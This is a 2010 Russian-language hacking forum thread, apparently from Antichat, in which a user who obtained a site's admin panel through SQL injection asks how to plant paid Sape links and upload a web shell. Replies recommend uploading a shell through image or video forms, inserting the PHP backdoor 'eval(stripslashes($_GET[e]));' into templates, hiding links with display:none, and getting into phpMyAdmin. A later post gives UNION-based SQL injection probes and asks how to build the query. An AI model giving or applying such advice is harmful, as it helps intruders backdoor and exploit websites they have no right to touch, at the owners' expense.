
29.11.2010, 17:00
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
Сообщение от MastaBass1
Такой вопрос, имеется сайт с хорошими показателями тиц и pr, доступ к админки вытащил из sql inj.
Возможно ли впихнуть рекламу( например sape), для заработка с него. Как сделать чтоб ее не запилили, может шел залить, как, какой? Спокойно выполняются js скрипты, можно с помощью них загнать шел на сервер, или еще как?
Сказал бы,что за кмс,если это не самопис то из админки известны способы заливки.
Если самопис какой-то,1.)ищи заливку картинок и пробуй загрузить шелл , 2.)Ищи место куда можно вставить пхп код и чтоб он исполнялся,например если в шаблонах разрешен пхп,то вставляешь туда пхп код например eval(stripslashes($_GET[e])); вызываешь пхпинфо,а дальше уже смотришь по ситуации...
|
|
|

29.11.2010, 17:30
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме: 97465
Репутация:
0
|
|
Сообщение от ~d0s~
Сказал бы,что за кмс,если это не самопис то из админки известны способы заливки.
Если самопис какой-то,1.)ищи заливку картинок и пробуй загрузить шелл , 2.)Ищи место куда можно вставить пхп код и чтоб он исполнялся,например если в шаблонах разрешен пхп,то вставляешь туда пхп код например eval(stripslashes($_GET[e])); вызываешь пхпинфо,а дальше уже смотришь по ситуации...
TrinetCMS, тоесть пробывать заливать скрипты через всевозможные формы загрузки( фотографии, видео и т.д.). Так а не запилят банер? Есть смысл делать это через Sape, просто при анализе это сайта через http://www.cy-pr.com/, говорят что сапа отвалит больше 1000 $ , вот и решил попробовать.
А какой шелл посоветуете, есть какие-нибудь факи по ним?
|
|
|

29.11.2010, 19:04
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от MastaBass1
TrinetCMS, тоесть пробывать заливать скрипты через всевозможные формы загрузки( фотографии, видео и т.д.). Так а не запилят банер? Есть смысл делать это через Sape, просто при анализе это сайта через http://www.cy-pr.com/, говорят что сапа отвалит больше 1000 $ , вот и решил попробовать.
А какой шелл посоветуете, есть какие-нибудь факи по ним?
губозакататель еще дадут бесплатный никелированный, если сапа даст больше 1к $, значит сайт с высоким тиц-ем, скорее всего он в сапе уже есть, если нет то за ним следят и спалят появление всяких ссылок очень быстро..
|
|
|

29.11.2010, 19:17
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме: 97465
Репутация:
0
|
|
Сообщение от Gorev
губозакататель еще дадут бесплатный никелированный, если сапа даст больше 1к $, значит сайт с высоким тиц-ем, скорее всего он в сапе уже есть, если нет то за ним следят и спалят появление всяких ссылок очень быстро..
Яша 450
Google PageRank (PR) 5
Его нет в сапе, а если умело, может и не запилят?
|
|
|

29.11.2010, 19:41
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
Провел на форуме: 90728
Репутация:
62
|
|
Сообщение от MastaBass1
Яша 450
Google PageRank (PR) 5
Его нет в сапе, а если умело, может и не запилят?
если на сайте нет нормального админа, а только контент-менеджер который дальше админки ничего не знает то можно попробовать скрыть в шаблоне ссылки через display:none, но все же это палево все равно. вдруг завтра как раз решат поставить сапу на сайт а тут хоп - сайт уже в сапе ))
|
|
|

29.11.2010, 19:54
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме: 97465
Репутация:
0
|
|
Сообщение от Чакэ
если на сайте нет нормального админа, а только контент-менеджер который дальше админки ничего не знает то можно попробовать скрыть в шаблоне ссылки через display:none, но все же это палево все равно. вдруг завтра как раз решат поставить сапу на сайт а тут хоп - сайт уже в сапе ))
Ну посмотрим, а что такое display:none, типо реклама вида Hide, так сапа заблочит за это?!
|
|
|

29.11.2010, 20:30
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме: 97465
Репутация:
0
|
|
Ладно, такой вопрос, если есть доступ через шел к папке phpmyadmin, а из адресной строки доступа нет(403 Forbidden), как открыть доступ к этой директории?
|
|
|

29.11.2010, 20:45
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
Провел на форуме: 90728
Репутация:
62
|
|
Сообщение от MastaBass1
Ладно, такой вопрос, если есть доступ через шел к папке phpmyadmin, а из адресной строки доступа нет(403 Forbidden), как открыть доступ к этой директории?
в этой папке или в корне есть .htaccess? может через него доступ закрыт.
|
|
|

29.11.2010, 20:50
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме: 97465
Репутация:
0
|
|
Сообщение от Чакэ
в этой папке или в корне есть .htaccess? может через него доступ закрыт.
Понял, поищу, спасибо!
|
|
|

30.11.2010, 15:29
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме: 0
Репутация:
0
|
|
Делаю запрос
Сообщение от None
id=2'+union+select+1--
Выходит такая ошибка:
Warning: array_merge() [function.array-merge]: Argument #2 is not an array
Если делаю так
Сообщение от None
id=2+union+select+1--
Отображается страница с записями
если перед 2 минус ставлю
Сообщение от None
id=-2+union+select+1--
getData: Incorrect table name '' SQL=SELECT DISTINCT `` AS blabla FROM `` LIMIT 0, 10
Какой запрос сформировать?
Интересно что даже если делаю 1,2,3,4 и т.д.
Сообщение от None
id=2+union+select+1,2,3,4--
данные отображаются
//обсуждение таких вопросов без указания линков, не эффективно..иногда даже без результата {модер}
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|